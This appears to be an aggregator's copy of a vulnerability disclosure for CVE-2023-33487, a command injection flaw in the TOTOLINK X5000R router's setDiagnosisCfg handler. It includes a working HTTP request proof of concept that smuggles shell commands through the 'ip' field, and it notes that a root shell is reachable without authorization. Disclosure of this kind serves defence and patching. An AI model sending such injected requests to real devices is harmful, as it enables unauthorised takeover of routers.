Headline

CVE-2023-33487: vuln/TOTOLINK/X5000R/4 at main · Kazamayc/vuln

TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contains a command insertion vulnerability in setDiagnosisCfg.This vulnerability allows an attacker to execute arbitrary commands through the “ip” parameter.

1 year ago

CVE

Open in Source

#vulnerability #ubuntu #linux #js #java #auth #firefox

TOTOLINK X5000R (V9.1.0u.6118_B20201102)was found to contain a command insertion vulnerability in setDiagnosisCfg.This vulnerability allows an attacker to execute arbitrary commands through the “ip” parameter.

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.3.2
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 96
Origin: http://192.168.3.2
Connection: close
Referer: http://192.168.3.2/advance/diagnosis.html?time=1679123070237
Cookie: SESSION_ID=2:1679122532:2

{"ip":"127.0.0.1 -w 2; ls > /tmp/1.txt; ping 127.0.0.1 ","num":"2","topicurl":"setDiagnosisCfg"}

Finally, you can write exp to get a stable root shell without authorization.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

10 months ago

10 months ago

10 months ago

10 months ago

10 months ago